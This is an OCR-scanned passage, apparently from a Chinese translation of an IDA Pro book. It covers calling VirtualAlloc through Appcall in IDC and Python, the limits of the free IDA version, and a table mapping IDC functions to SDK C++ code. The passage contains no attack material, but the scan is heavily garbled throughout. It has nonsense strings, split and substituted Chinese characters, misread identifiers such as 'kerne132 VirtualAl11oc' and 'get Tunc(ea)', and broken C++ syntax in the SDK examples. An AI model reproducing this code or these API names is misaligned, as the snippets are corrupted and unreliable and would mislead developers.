如 前 所 述 ， 在 调试 Windows 进程 时 ，IDA Zw RUNIE IEEE A ENEN RET FEE PRICES t Er 
DUDU. DI. 激活 调试 硕 后 ,VirtualAlloc 将 被 命名 为 kerne132 VirtualAl11oc， 如 下 面 的 代码 
所 示 : 


kernel32.dll:766B2FB6 

kernel32.dll:766B2FB6 ; Attributes: bp-based frame 
kernel32.dll:766B2FB6 

kernel32.dll:766B2FB6 kernel32 VirtualAlloc proc near 


由 于 IDA 的 类 型 库 对 名 为 kerne132 VirtualAlloc 的 函数 一 无 所 知 ， 所 以 不 会 显示 任何 类 型 
信息 。 由 于 Appcall 需要 了 解 函数 的 类 型 签名 ， 因 此 我 们 需要 使 用 Set Function Type 命令 将 相 
关 信 息 添 加 到 数据 库 中 。 只 要 我 们 指定 的 签名 允许 IDA 将 参数 正确 传送 给 所 调用 的 函数 ， 就 不 
需要 具体 的 类 型 签名 了 。 在 本 例 中 ,我 们 提供 了 以 下 签名 : 

















kernel32.dll:766B2FB6 ; Attributes: bp-based frame 

kernel32.dll:766B2FB6 

kernel32.d11:766B2FB6 ; int stdcall kernel32 VirtualAlloc(int, int, int, int) 
kernel32.dll:766B2FB6 kernel32 VirtualAlloc proc near 


现在 ,我 们 已 经 作 好 准备 ， 可 以 使 用 Appcall 为 我 们 的 进程 分 配 更 多 内 存 。 使 用 IDC 可 以 轻 
松 完成 这 个 任务 ， 因 为 我 们 只 需要 调用 VirtualA11oc， 就 像 调 用 IDC PRZIC—FE. Æ IDA 命令 行 
中 输入 函数 调用 ， 并 使 用 Message 函数 显示 结果 ， 将 生成 以 下 输出 : 











IDC>Message("%x\n", kernel32 VirtualAlloc(0, 4096, 0x3000, 4)); 
3c0000 


结果 , 一 个 4096 字 节 的 新 内 存 块 分 配给 了 地 址 0x3c0000 处 的 进程 。 要 在 IDA 中 显示 这 个 新 
内 存 块 ， 我 们 必须 使 用 Debugger » Refresh 内 存 命令 ， 或 等 候 IDA 执行 刷新 及 其 他 调试 硕 操 作 。 

在 Python 中 执行 Appcall 的 请 法 会 略 有 不 同 ,需要 用 到 在 idaapi 模块 中 定义 的 Appcall 变量 。 
但 是 ,你 仍然 需要 提供 命名 函数 与 类 型 签名 。 以 Python 编写 的 、 使 用 Appcall 调用 VirtualAlloc 
水 数 的 代码 如 下 所 示 : 
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Python>Message("%x\n" % Appcall.kernel32 VirtualAlloc(0, 4096, 0x3000, 4)) 
3d0000 


有 关 Appeal 及 其 用 法 的 其 他 信息 与 示例 ， 请 参阅 Hex-Rays 博客 ”。 





26.4 ”小 结 


在 Hex-Rays 开发 团队 与 用 户 的 共同 努力 下 ，IDA 调试 器 的 功能 越 来 越 强 大 。Hex-Rays 博客 
( http://www.hexblog.com/ ) 是 你 了 解 这 些 最 新 功能 的 最 佳 场所 ，Hex-Rays 开发 人 员 经 向 会 在 这 里 
公布 最 新 版 本 的 IDA 将 提供 的 新 功能 。 追 中 用户 作出 的 功能 扩展 可 能 需要 你 付出 更 多 的 努力 。 
HT, IDA 支持 论坛 会 公布 一 些 有 趣 的 IDA 扩展 , 但 你 很 可 能 会 在 各 种 逆 癌 工程 论坛 (如 http:// 
www.openrce.org/ ) 看 到 它们 ， 在 Hex-Rays 的 年 度 插 件 编写 欧 宪 中 看 到 它们 ,或 者 在 网 上 搜索 时 
偶然 遇 到 它们 。 

IDA 调试 需 不 但 功能 强大 ， 而 且 易 于 扩展 。 通 过 本 地 与 远程 功能 ， 以 及 可 作为 大 量 流行 调试 
Ze ( 如 gdb 和 WinDbg ) 的 前 端 ，IDA 为 各 种 流行 平台 提供 了 一 致 的 调试 界面 。 通 过 扩展 脚本 或 
构建 已 编译 的 调试 套 插 件 ， 调 试 顺 的 功能 得 到 不 断 扩 展 。 与 当前 的 其 他 调试 袁 相 比 ，IDA 调试 需 
具有 得 天 独 厚 的 优势 , 因为 它 的 所 有 核心 开发 人 员 本 喘 也 是 逆 癌 工程 人 员 , 他 们 的 个 人 与 专业 兴 
趣 相投 ， 都 希望 调试 硕 成 为 一 个 强大 而 实用 的 工具 。 





























(D 参见 http:/www.hexblog.com/?p=113。 
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010 4Æ 12 H , Hex-Rays 对 免费 版 本 的 IDA 进行 了 重大 升级 , 由 版 本 4.9 升级 到 版 本 5.0; 

免费 版 本 的 IDA 是 一 个 功能 有 限 的 应 用 程序 。 与 最 新 版 本 的 IDA 相 比 ， 人 免费 版 本 通常 

要 落后 好 几 个 版 本 ， 而 与 相同 版 本 的 商业 IDA 相 比 ， 免 费 版 本 提供 的 功能 要 少 得 多 。 因 此 ， 免 

费 版 本 不 仅 缺 乏 最 新 版 本 DA 所 提供 的 任何 新 特性 ， 其 功能 也 比 IDA 5.0 的 商业 版 本 要 少 很 多 。 

本 附录 旨 在 简单 介绍 IDA 人 免费 版 本 的 功能 ， 并 指出 免费 版 本 与 本 书 ( 针对 最 新 版 本 的 IDA ) 

所 摘 述 的 IDA 之 间 的 主要 区 别 。 在 开始 介绍 之 前 ， 需 要 注意 的 是 ，Hex-Rays 还 提供 IDA 最 新 商 

业 版 本 的 一 个 演示 版 本 。 与 免费 版 本 一 样 , 演示 版 本 的 功能 也 在 许多 方面 进行 了 删 减 ， 并 量 无 法 

保存 你 的 工作 。 此 外 ， 演 示 版 本 会 随时 暂 仿 (不 保存 你 的 工作 )， 如 果 你 希望 恢复 演示 ， 就 必须 
重新 启动 该 版 本 。 


A.1 1IDA 人 免费 版 本 的 限制 


如 果 你 希望 使 用 免费 版 本 的 IDA, 必须 遵守 ( 可 能 还 得 忍受 ) 以 下 限制 并 容 义 功能 上 的 删 减 。 

O 免费 版 本 只 能 用 于 非 商 业 用 途 。 

O 免费 版 本 只 提供 Windows GUI 版 本 。 

口 免费 版 本 缺乏 最 新 版 本 的 IDA 引 入 的 任何 特性 ,包括 版 本 5.1 及 更 高 版 本 提供 的 所 有 SDK 
与 脚本 功能 。 

口 启动 免费 版 本 后 ， 将 显示 一 个 介绍 最 新 版 本 IDA 功能 的 帮助 页 面 。 你 可 以 禁用 此 特性 ， 
以 们 这 个 页 面 在 随后 启动 免费 版 本 时 显示 。 

OQ 与 商业 版 本 相 比 ， 免 费 版 本 附 市 的 插件 要 少 得 多 。 

O 免费 版 本 只 能 反 汇 编 x86 代码 〈 它 只 有 一 个 处 理 需 模块 )。 

O 免费 版 本 只 附 审 S Tn, uds] x86 文件 类 型 ， 包括 PE, ELF, Mach-O, 
MS-DOS, COFF 和 a.out。 同 时 支持 以 二 进 制 格式 加 载 文 件 。 

ü 免费 版 本 仅 提 供 少 数 几 个 党 用 于 x86 二 进 制 文件 的 类 型 库 ,包括 那些 用 于 GNU, Microsoft 
和 Borland 编 详 需 的 类 型 库 。 

D 免费 版 本 自 带 的 IDC 脚本 要 远 远 少 于 5.0 版 本 ， 而 且 它 不 提供 任何 Python 脚本 ， 因 为 版 
本 5.0 的 发 布 日 期 要 早 于 集成 IDAPython 的 日 期 。 
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a 免费 版 本 也 不 提供 FLAIR 工具 和 SDK。 

口 免费 版 本 只 能 用 于 调试 本 地 Windows 进程 或 二 进 制 文件 。 该 版 本 不 提供 远程 调试 功能 。 

IDA 免费 版 本 的 外 观 与 所 有 商业 版 本 的 外 观 类 似 。 至 于 免费 版 本 的 功能 ， 其 行为 与 本 书 E 
对 商业 版 本 的 IDA ) 所 介绍 的 行为 相似 (即使 不 是 完全 相同 )。 因 此 ，IDA 免费 版 本 是 你 决定 购 
买 IDA 之 前 熟悉 它 的 最 佳 途径 。 在 非 商业 背景 下 (如 学 术 环境 中 )， 如 果 x86 限制 不 会 给 你 造成 
问题 ， 你 可 以 利用 IDA 免费 版 本 学 习 反 汇编 与 逆向 工程 的 基础 知识 。 


A.2 使 用 IDA 免 费 版 本 


就 对 常见 的 文件 进行 x86 反 汇 编 而 言 ,IDA 免费 版 本 可 提供 你 所 需 的 全 部 功能 ,而 且 ,IDA 5.0 
是 第 一 个 提供 集成 化 图 形 显示 模式 的 IDA 版 本 。 仪 这 项 特性 就 显著 提高 了 人 免费 版 本 的 功能 。 只 
有 在 你 需要 IDA 的 高 级 功能 时 ， 免 费 版 本 才 会 显得 “力不从心 ”。 这 种 缺陷 在 创建 FLIRT 签名 与 
创建 并 使 用 IDA 搬 件 方面 表现 得 尤为 突出 。FLAIR 实用 工具 (人 参见 第 12 3€ ) 和 IDASDK (参见 
第 16 È ) 仅 供 IDA 商业 版 本 的 注册 用 户 使 用 ,人 免费 版 本 的 用 户 很 难 体验 到 这 些 功能 。 

TAA qo FLIRT 签名 感 兴趣 ， 请 注意 ， 人 免费 版 本 能 够 处 理由 4.9 及 更 高 版 本 的 FLAIR 实用 
工具 生成 的 签名 C 如 果 你 能 够 接触 这 些 实 用 工具 , 或 让 其 他 人 帮助 你 生成 签名 ) 使 用 SDK 则 更 
加 困难 一 些 。 即 使 你 设法 获得 5.0 版 本 的 IDASDK, 使 用 未 修改 的 5.0 版 本 SDK 编译 的 插件 并 不 
能 与 IDA 免费 版 本 莱 容 。 这 是 因为 , 人 免费 版 本 从 核心 IDA 库 中 导出 图 数 的 方法 与 SDK 所 采用 的 
方法 截然 不 同 , 因此 需要 一 组 不 同 的 导入 库 才 能 正确 进行 链接 ,针对 之 前 的 免费 版 本 ( 特别 是 IDA 
4.9 )， 许 多 逆向 工程 论坛 "一 直 在 讨论 这 一 主题 。 之 前 的 解决 方案 需要 修订 版 本 的 SDK， 而 要 获 
得 此 类 SDK 并 不 容易 。 到 本 书 截 稿 时 , 在 为 IDA 5.0 免费 版 本 编译 插件 方面 ， 人 们 尚未 找到 切实 
可 行 的 方法 。 因 此 ,希望 试用 各 种 常用 插件 ( 参见 第 233) 的 用 户 可 能 需要 联系 这 些 插件 的 作 
者 ， 看 他 们 是 否 有 办 法 为 他 们 的 插件 生成 与 IDA 免费 版 兼容 的 二 进 制版 本 。 















































(D 参见 http:/www.woodmann.com/forum/showthread.php?t=10756。 


IDC/SDK3z X. 51 FB 





B-1 将 IDC 脚本 函数 与 它们 对 应 的 SDK 实现 对 应 了 起 来 。 本 表 旨 在 帮助 熟悉 IDC 的 程 
序 员 了 解 如 何 使 用 SDK 哺 数 执行 类 似 的 操作 ,你 需要 一 个 这 样 的 表 , 是 由 于 两 个 原因 : 
(1) IDC 也 数 与 它们 对 应 的 SDK 荫 数 在 名 称 上 并 不 完全 对 应 ; Q) 有 时 候 ， 一 个 IDC 函数 由 几 个 
SDK 操作 构成 。 本 表 还 提供 了 一 些 方法 , 说明 SDK 如 何 利 用 网 络 节点 在 IDA 数据 库 中 存储 信息 。 
具体 来 说 ， 当 我 们 检查 用 于 操纵 数组 的 IDC 函数 时 ， 我 们 发 现实 现 IDC 数组 时 网 络 节 点 的 使 用 
方式 很 明显 。 
本 表 使 SDK 方面 的 描述 尽 可 能 简单 。 为 此 ， 我 们 省 略 了 检查 错误 的 代码 ， 以 及 许多 C++ 语 
法 元 素 ( 如 {} 插 号 ) 许多 SDK 冰 数 通过 将 数据 复制 到 调用 方 提供 的 缓冲 区 中 来 返回 结果 。 为 了 
简化 ， 我 们 并 没有 声明 这 些 缓冲 区 。 为 保持 一 致 ， 这 样 的 缓冲 区 被 命名 为 buf， 许 多 时 候 ， 它 们 
的 大 小 被 假定 为 1024 字 节 ， 这 是 IDA 6.1 SDK 的 MAXSTR 常量 的 值 。 最 后 ， 在 变量 的 使 用 有 助 于 
我 们 了 解 示例 的 地 方 ， 我 们 使 用 了 变量 声明 。 未 声明 的 变量 通常 为 IDC 因数 输入 参数 ， 它 们 在 
IDA 内 置 的 帮助 系统 中 对 应 的 参考 页 面 内 命名 。 
需要 注意 的 是 ,这 些 年 来 , IDC 已 经 有 了 巨大 的 变化 。 最 早 的 IDC 版 本 的 主要 目的 是 ,向 脚 
本 程序 员 提 供 SDK 的 一 些 和 常用 功能 。 随 着 该 语言 的 功能 不 断 增 强 ， 其 中 增加 了 一 些 用 于 支持 高 
级 IDC 功能 C 如 对 象 和 异常 ) 的 IDC 函数 。 所 有 IDC 因数 最 终 都 需要 由 SDK 男 数 提供 文 持 ， 
此 ,就 像 是 一 种 角色 互 换 ， 新 的 IDC 功能 需要 新 增 SDK "nb Dor 最 新 版 本 的 SDK 包含 许多 
由 在 提供 DC 对 象 模型 的 低级 实现 的 函数 。 多 数 情 况 下 ， 用 户 不 需要 从 已 编译 的 模块 内 使 用 这 
些 函 数 。 但 是 ,在 你 通过 增加 新 函数 开发 扩展 IDC 语言 的 插件 时 ， 可 能 需要 用 到 对 象 操 作 函 数 。 









































SS Bi 
IDC 函数 SDK 实现 
AddAutoStkPnt2 add auto stkpnt2(get func(func ea), ea, delta); 
AddBpt //macro for AddBptEx(ea, 0, BPT SOFT); 
AddBptEx add bpt(ea, size, bpttype); 
AdaCodeXref add cref(From, To, flowtype); 
AddConstEx add const(enum id, name, value, bmask); 


AddEntryPoint add entry(ordinal, ea, name, makecode); 


IDC 函数 


AddEnum 
AddHotkey 
AddSeg 


AddSourceFile 
AddStrucEx 
AddStrucMember 


AltOp 


Analysis 
AnalyzeArea 
Appca l1 


AppendFchunk 
ApplySig 
AskAddr 


AskFile 
Ask Ident 
AskLong 
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SDK 实现 
add enum(idx, name, flag); 
add idc hotkey(hotkey, idcfunc); 
segment t s; 
.StartEA = Started; 
.endEA = endEA; 
.sel = setup selector(base); 
.bitness = use32; 
.dlign = align: 


Uo) C) Go Ct Ct» On 


.comb = comb; 
add segm ex(&s, NULL, NULL, ADDSEG NOSREG):; 
add sourcefile(eal, ea2, filename); 
add struc(index, name, is union); 
typeinfo t mt; 
//calls an internal function to initialize mt using typeid 
add struc member(get struc(id), name, offset, flag, &mt, nbytes); 
get forced operand(ea, n, buf, sizeof(buf)); 
return qstrdup(buf); 
//macro for SetCharPrm(INF AUTO, x) 
analyze area(sEA, eEA); 
//nargs is the number of arguments following type 
/largs is idc value t[] of args following type 
idc value t result; 
if (type.vtype -- VT LONG && type.num -- 0) 
appcall(ea, 0, NULL, NULL, nargs, args, &result); 
else 
idc value t tval, fields; 
internal parse type(8Stype, &tval, &fields); 
appcall(ea, 0, &tval, &fields, nargs, args, &result); 


append func tail(get func(funcea), eal, ea2); 

plan to apply idasgn(name); 

ea t addr = defval; 

askaddr(&addr, "Zs", prompt): 

return addr; 

return qstrdup(askfile c(forsave, mask, "5s", prompt)); 
return qstrdup(askident(defval, "Zs", prompt)); 

sval t val = defval; 

asklong(&val, "$s", prompt): 

return val; 
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IDC 函数 
AskSeg 


AskSelector 
AskStr 

AsSkYN 
AttachProcess 
AutoMark 
AutoMark2 
AutoShow 
AutoUnmark 


Batch 

BeginEA 
BeginlypeUpdating 
Byte 

CanExcept ionCont inue 
ChangeConf ig 
CheckBpt 
Checkpoint 
ChooseFunction 
CleanupAppcal | 
Cmt Indent 
CommentEx 


Comments 


Compi le 


Compi l eEx 


CreateArray 


DbgByte 


SDK 实现 
sel t seg - defval; 
askseg(8sel, "Zs", prompt): 
return val; 
return ask selector(sel); 
return qstrdup(askstr(HIST CMT, defval, "Zs", prompt)); 
return askyn c(defval, "$s", prompt); 
return attach process(pid, event id); 
//macro, see AutoMark2 
auto mark range(start, end, queuetype) ; 
//[macro, see SetCharPrm 
/ /*** undocumented function 
autoUnmark(start, end, type): 
: :batch = batch; 
//macro, see GetLongPrm 
return begin type updating(utp) 
return get full byte(ea); 
return get debug event()-»can cont; 
internal change config(line) 
check bpt(ea) 
//*** undocumented function 
return choose func(ea, -1)-»startEA; 
return cleanup appcall(0) == 
//[macro, see SetCharPrm 
get cmt(ea, repeatable, buf, sizeof(buf)); 
return qstrdup(buf); 
//[macro, see SetCharPrm 
//macro for CompileEx(file, 1); 
if (isfile) 
CompileEx(input, CPL DEL MACROS | CPL USE LABELS, 
errbuf, sizeof(errbuf)); 
else 
CompileLineExCinput, errbuf, sizeof(errbuf)); 
qsnprintf(buf, sizeof(buf), "$ idc array Ze". name); 
netnode n(buf, 0, true); 
return (nodeidx Tim: 
if (dbg && (dbg-»may disturb() || get process state() « 0)) 
uint8 t b; 
dbg-»read memory(ea, &b, sizeof(b)); 
return b; 


IDC 函数 
DbgDword 


DbgQword 


DbgRead 


DbgWord 


DbgWr ite 


DecodeInstruction 


DefineException 
DelArrayElement 
DelBpt 
DelCodeXref 
DelConstEx 
DelEnum 
DelExtLnA 
DelExtLnB 
DelFixup 
DelFunction 
DelHashE lement 


DelHiddenArea 
DelHotkey 
DelLineNumber 
DelSeg 
DelSelector 
DelSourceFile 
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SDK 实现 
if (dbg && (dbg-»may disturb() || get process state() 
uint32 t d; 
dbg-»read memory(ea, Ad. sizeof(d)); 
return d; 
if (dbg && (dbg-»may disturb() || get process state() 
uinto4 t q; 
dbg-»read memory(ea, &q, sizeof(q)); 
return q; 
if (dbg && (dbg-»may disturb() || get process state(O) 
uint8 t *buf = (uint8 t*) qalloc(len); 
dbg-»read memory(ea, buf, len); 
return buf; 
if (dbg && (dbg-»may disturb() || get process state(O) 
uintl6 t w; 
dbg-»read memory(ea, &w, sizeof(w)); 
return w; 
if (dbg && (dbg-»may disturb() || get process state(O) 
dbg-»write memory(ea, data, length of data); 
ua ana0(ea); 
return cmd; 
return define exception(code, name, desc, flags); 
netnode n(id).supdel(idx, tag); 
del bpt(ea):; 
del cref(From, To, undef); 
del const(enum id, value, serial, bmask); 
del enum(enum 1d); 
netnode n(ea).supdel(n + 1000); 
netnode n(ea).supdel(n + 2000); 
del fixup(ea); 
del func(ea); 
netnode n(id); 
n.hashdel(idx); 
del hidden area (ea); 
del idc hotkey(hotkey); 
del source linnum(ea); 
del segm(ea, flags); 
del selector(sel); 
del sourcefile(ea); 


0)) 


0)) 


0)) 


0)) 


0)) 
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IDC 函数 


DelStkPnt 
DelStruc 
DelStrucMember 
De XML 
DeleteAl| 


DeleteArray 
Demangle 


DetachProcess 
Dfirst 
DfirstB 

Dnext 

DnextB 

Dword 
EnableBpt 
EnableIracing 


EndTypeUpdat ing 
Eval 


Exec 
ExecIDC 


SDK 实现 

del stkpnt(get func(func ea), ea); 
del struc(get struc(id)); 
del struc member(get struc(id), offset); 
del xml(path); 
while (get segm qty O) 

del segm(getnseg (0), 0); 
FlagsDisable(0, inf.ominEA); 
FlagsDisable(inf.omaxEA, OxFFFFFFFF); 
netnode n(id).killO; 
demangle name(buf, sizeof(buf), name, disable mask); 
return qstrdup(buf); 
detach process; 
return get first dref from(From); 
return get first dref to(To); 
return get next dref from(From, current); 
return get next dref to(To, current); 
return get full long(ea); 
enable bpt(ea, enable); 
if (trace level == 0) 

return enable step trace(enable); 
else if (trace level -- 1) 

return enable insn trace(enable); 
else if (trace level == 2) 

return enable func trace(enable); 


end type updating(utp); 
idc value t v; 
calcexpr(-1, expr, &v, errbuf, sizeof(errbuf)); 
call system(command) ; 
char fname[16]: 
uint32 t fnum = globalCount-; //mutex around globalCount 
qsnprintf(fname, sizeof(fname), " | idcexecZd", fnum); 
uint32 t len; 
len = qsnprintf(NULL, 0, "static %s() {\n%s\n; }", fname, input); 
char *func = (char*)galloc(len); 
qsnprintf(func, len, "static Zei) (AnZsNn; }", fname, input); 
Executeline(func, fname, NULL, 0, NULL, NULL, err, sizeof(err)); 
globalCount--; //mutex around globalCount 

qfree(func); 


IDC 函数 


Exit 
ExtLinA 


ExtLinB 


Fatal 
FindBinary 


FindCode 
FindData 
FindExplored 
FindFuncEnd 


FindImmediate 
FindSelector 
Findlext 
FindUnexplored 
FindVoid 
FirstFuncFchunk 
FirstSeg 


ForgetExcept ion 


GenCallGdl 
GenFuncGdl 


GenerateFile 


GetArrayE lement 
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SDK 实现 

qexit(code):; 
netnode n(ea).supset(n + 1000, line); 
setFlbits(ea, FF LINE); 
netnode n(ea).supset(n + 2000, line); 
seuribitstes, TF LINES 
error(format, ...); 
ea t endea - (flag & SEARCH DOWN) ? inf.maxEA : inf.minEA; 
return find binary(ea, endea, str, getDefaultRadix(), flag); 
return find code(ea, flag); 
return find data(ea, flag); 
return find defined(ea, flag); 
Tunc- t Ts 
find func bounds(ea, &f, FIND FUN DEFINE); 
return f-»endEA; 
return find imm(ea, flag, value); 
return find selector(val); 
return find text(ea, y, x, str, flag); 
return find unknown(ea, flag); 
return find void(ea, flag); 
get func(funcea)-»startEA; 
return getnseg (0)-»startEA; 
excvec t *ev = retrieve exceptions(); 
for (excvec t::iterator i = ev-»begin(); i !- ev-»end(); i++) 

if ((*1).code == code) 

ev-»erase(1); 
return store exceptions(); 

return 0; 
gen simple call chart(outfile, "Building graph", title, flags); 
func t *f = get func(eal); 
gen flow graph(outfile, title, f, eal, ea2, flags); 
gen file(type, file handle, eal, ea2, flags); 
netnode n(id); 
if (tag == 'A') return n.altval(Cidx); 
else 1f (tag '$ ) 

n.supstr(idx, buf, sizeof(buf)); 

return qstrdup(buf) ; 
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IDC 函数 


GetArrayId 


GetBmaskCmt 


GetBmaskName 


GetBptAttr 


GetBptEA 


GetBptQty 
GetCharPrm 


GetColor 


GetConstBmask 
GetConstByName 
GetConstCmt 


GetConstEnum 
GetConstEx 
GetConstName 


GetConstValue 
GetCurrentL ine 


SDK 实现 
qsnprintf(buf, sizeof(buf), "$ idc array Ze". name); 
netnode n(buf); 
return (nodeidx Lin: 
get bmask cmt(enum id, bmask, repeatable, buf, sizeof(buf)); 
return qstrdup(buf); 
get bmask name(enum id, bmask, buf, sizeof(buf)); 
return qstrdup(buf); 
bpt t bpt; 
if (get bpt(ea, &bpt) == 0) return -1; 
if (bpattr == BPTATTR EA) return bpt.ea; 
else if (bpattr == BPTATTR SIZE) return bpt.size; 
else if (bpattr == BPTATTR TYPE) return bpt.type; 
else if (bpattr == BPTATTR COUNT) return bpt.pass count; 
else if (bpattr == BPTATTR FLAGS) return bpt.flags; 
( 


else if (bpattr == BPTATTR COND) return qstrdup(bpt .condition); 


Dpt t Dpi; 
return getn bpt(n, &bpt) ? bpt.ea : -1; 
return get bpt qtyO; 
If (offset <= 191) 
return *(unsigned char*)(offset + (char*)8&inf); 
if (what == CIC ITEM) 
return get color(ea); 
else if (what == CIC FUNC) 
return get func(ea)-»color; 
else if (what == CIC SEGM) 
return get seg(ea)-»color; 
return OxFFFFFFFF; 


return get const bmask(const id); 

return get const by name(name); 

get const cmt(const id, repeatable, buf, sizeof(buf)); 
return qstrdup(buf); 

return get const enum(const id); 

return get const(enum id, value, serial, bmask); 
get const name(const id, buf, sizeof(buf)); 
return qstrdup(buf) ; 

return get const value(const id); 

tag remove(get curline(), buf, sizeof(buf)) 
return qstrdup(buf) ; 


IDC 函数 


GetCurrentThreadId 
GetCustomDataFormat 
GetCustomDatalype 


GetDebuggerEvent 
GetDisasm 


GetEntryName 


GetEntryOrdinal 
GetEntryPoint 
GetEntryPointQty 
GetEnum 
GetEnumCmt 


GetEnumF lag 
GetEnumIdx 
GetEnumName 


GetEnumQty 
GetEnumS ize 
GetEnumwidth 


GetEventBptHardwareEka 


GetEventEa 


GetEventExcept ionCode 
GetEventExcept ionEa 
GetEventExceptionInfo 


GetEventExitCode 
GetEvent Id 
GetEvent Info 


GetEventModuleBase 
GetEventModuleName 
GetEventModuleSize 


GetEventPid 
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return get current thread(); 
return find custom data format(name); 
return find custom data type(name):; 
return wait for next event(wfne, timeout): 
generate disasm line(ea, buf, sizeof(buf)); 
tag remove(buf, buf, 0); 
return qstrdup(buf); 
get entry name(ordinal, buf, sizeof(buf)); 
return qstrdup(buf); 
return get entry ordinal(Cindex); 
return get entry(ordinal); 
return get entry qtyO; 
return get enum(name); 
get enum cmt(enum id, repeatable, buf, sizeof(buf)); 
return qstrdup(buf); 
return get enum flag(enum id); 
return get enum idx(enum id); 
get enum name(enum id, buf, sizeof(buf)); 
return qstrdup(buf); 
return get enum qty(); 
return get enum size(enum id); 
if (enum id > Oxff000000) 

netnode n(enum id); 

return (n.altval(Oxfffffffb) »» 3) A 7; 


else 

return 0; 
return get debug event()-»bpt.hea; 
return get debug event()-»ea; 
return get debug event()-»exc.code; 
return get debug event()-»exc.ea; 


return qstrdup(get debug event()-»exc.info); 
return get debug event()-»exit code; 

return get debug event()-»eid; 

return qstrdup(get debug event()-»info); 

return get debug event()-»modinfo.base; 

return qstrdup(get debug event()-»modinfo.name); 
return get debug event()-»modinfo.size; 

return get debug event()-»pid; 
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IDC 函数 
GetEventTid 
GetExcept ionCode 


GetExceptionFlags 


GetExcept ionName 


GetExcept ionQty 
GetFchunkAttr 


GetFchunkReferer 
GetFirstBmask 
GetFirstConst 
GetFirstHashKey 
GetFirstlIndex 


GetFirstMember 
GetFirstModule 


GetFirstStrucldx 
GetFixuplIgtDispl 


GetFixupIgtOff 


GetFixupIgtSel 


SDK 实现 

return get debug event()-»tid; 
excvec t fev = retrieve exceptions(); 
return idx « ev-»size() ? (*ev)[idx].code : 0; 
excvec t *ev = retrieve exceptions(); 
for (excvec t::iterator i = ev-»begin(); i !- ev-»end(O); TH) 

if ((*1).code -- code) 

return E TI3gs: 

return -1; 
excvec t *ev = retrieve exceptions(); 
for (excvec t::iterator i = ev->begin(); i !- ev->end(); i++) 

if ((*1).code -- code) 

return new qstring((*1).name) ; 

return NULL; 
return retrieve exceptions()-»size(O; 
func t *f = get func(ea); 
return internal get attr(f, attr); 
func t *f = get fchunk(ea); 
func parent iterator t fpi(f); 
return n < f-»refqty ? f-»referers[n] : BADADDR; 
return get first bmask(enum id); 
return get first const(enum id, bmask); 
netnode n(id).hashlst(buf, sizeof(buf)); 
return qstrdup(buf); 
return netnode n(id).suplst(tag); 
return get struc first offset(get struc(id)); 
module info t modinfo; 
get first module(&modinfo); 
return modinfo.base; 
return get first struc idxO; 
fixup data t fd; 
get fixup(ea, &fd); 
return fd.displacement; 
fixup data t fd; 
get fixup(ea, &fd); 
return fd.off 
fixup data t fd; 
get fixup(ea, &fd); 
return. Td.seT; 


IDC 函数 
GetFixupTgtType 


GetF lags 
GetFpNum 


GetFrame 
GetFrameArgsSize 
GetFramelvarSize 
GetFrameRegsSize 
GetFrameSize 
GetFuncOffset 


GetFunctionAttr 


GetFunctionCmt 
GetFunctionFlags 


GetFunctionName 


GetHashLong 
GetHashString 


Get IdaDirectory 


GetIdbPath 


GetInputFile 


GetInputFilePath 
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fixup_data t fd; 
get_fixup(ea, &fd); 
return fd.type; 
getFlags(ea); 
//*** undocumented function 
char buf[16]; 
union (float f; double d; long double ld) val; 
get many bytes(ea, buf, len » 16 ? 16 : len); 
ph.realcvt(buf, &val, (len >> 1) - 1); 
return val; 
/[macro, see GetFunctionAttr 
//macro, see GetFunctionAttr 
/[macro, see GetFunctionAttr 
//macro, see GetFunctionAttr 
return get frame size(get func(ea)); 
int flags = GNCN REQFUNC | GNCN NOCOLOR; 
get nice colored name(ea, buf, sizeof(buf),flags); 
return qstrdup(buf); 
Tunc t *f — get Tunc(ea); 
return internal get attr(f, attr); 
return get func cmt(get func(ea), repeatable); 
/[macro, see GetFunctionAttr 
get func name(ea, buf, sizeof(buf)); 
return qstrdup(buf); 
netnode n(id).hashval long(idx); 
netnode n(id).hashval(idx, buf, sizeof(buf)); 
return qstrdup(buf); 
qstrncpy(buf, idadir(NULL), sizeof(buf)); 
return qstrdup(buf); 
qstrncpy(buf, database idb, sizeof(buf)); 
return qstrdup(buf); 
get root filename(buf, sizeof(buf)); 
return qstrdup(buf); 
RootNode.valstr(buf, sizeof(buf)); 
return qstrdup(buf); 
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IDC 函数 
Get InputMD5 


GetLastBmask 
GetLastConst 
GetLastHashKey 


GetLastIndex 
GetLastMember 
GetLastStrucIdx 
Get ineNumber 


GetLoca lType 


GetLocalTypeName 
GetLongPrm 


GetManualInsn 


SDK 实现 
uint8 t md5bbin[16]; 
char out[1024]; 
char *outp - out; 
int len = sizeof(out); 
OULLU] e He 
RootNode.supval(RIDX MD5, mdbbin, sizeof(mdbbin)); 
for (int j = 0; j < sizeof(mdbbin); j++) ( 
int nbytes = qsnprintf(out, len, "202X", md5bin[j]): 
outp je nbytes; 
len -= nbytes; 
j 
return qstrdup(out):; 
return get last bmask(enum id); 
return get last const(enum id, bmask); 
netnode n(id).hashlast(buf, sizeof(buf)); 
return qstrdup(buf); 
return netnode n(id).suplast(tag); 
return get struc last offset(get struc(id)); 
return get last struc idx(); 
return get source linnum(ea); 
const type t *type; 
const p list *fields; 
get numbered type(idati, ordinal, &type, &fields, 
NULL, NULL, NULL); 
char *name = get numbered type name(idati, ordinal); 
qstring res; 
print type to qstring(&res, 0, 2, 40, flags, idati, type, 
name, NULL, fields, NULL); 
return qstrdup(res.c str()); 
return qstrdup(get numbered type name(idati, ordinal)); 
if (offset «- 188) 
return *(int*)Coffset + (char*)8&inf); 
get manual insn(ea, buf, sizeof(buf)); 


return qstrdup(buf); 


IDC 函数 
GetManyBytes 


GetMarkComment 
GetMarkedPos 


GetMaxLocal Type 
GetMemberComment 


GetMemberF lag 
GetMemberName 


GetMemberOffset 
GetMember(Qty 
GetMemberSize 
GetMemberStrId 
GetMinSpd 


GetMnem 


GetModuleName 
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SDK 实现 
uint8 t *out = (uinte t*)galloc(size * 1); 
if (use dbg) 
if (dbg AR (dbg-»may disturb() || get process state() = 0)) 
dbg-»read memory(ea, out, size); 


else 
qfree(out); 
out = NULL; 
else 


get many bytes(ea, out, size); 
return out; 


curloc loc.markdesc(slot, buf, sizeof(buf)); 
return qstrdup(buf); 
return curloc loc.markedpos(&slot); 
return get ordinal qty(idati); 
tid t m= get member(get struc(id), offset)-»id; 
netnode n(m).supstr(repeatable ? 1 : 0, buf, sizeof(buf)); 
return qstrdup(buf); 
return get member(get struc(id), offset)-»flag; 
tid t m= get member(get struc(id), offset)-»id; 
get member name(m, buf, sizeof(buf)); 
return qstrdup(buf); 
return get member by name(get struc(id), member name)-»soff; 
get struc(id)-»memqty:; 
member t *m = get member(get struc(id), offset); 
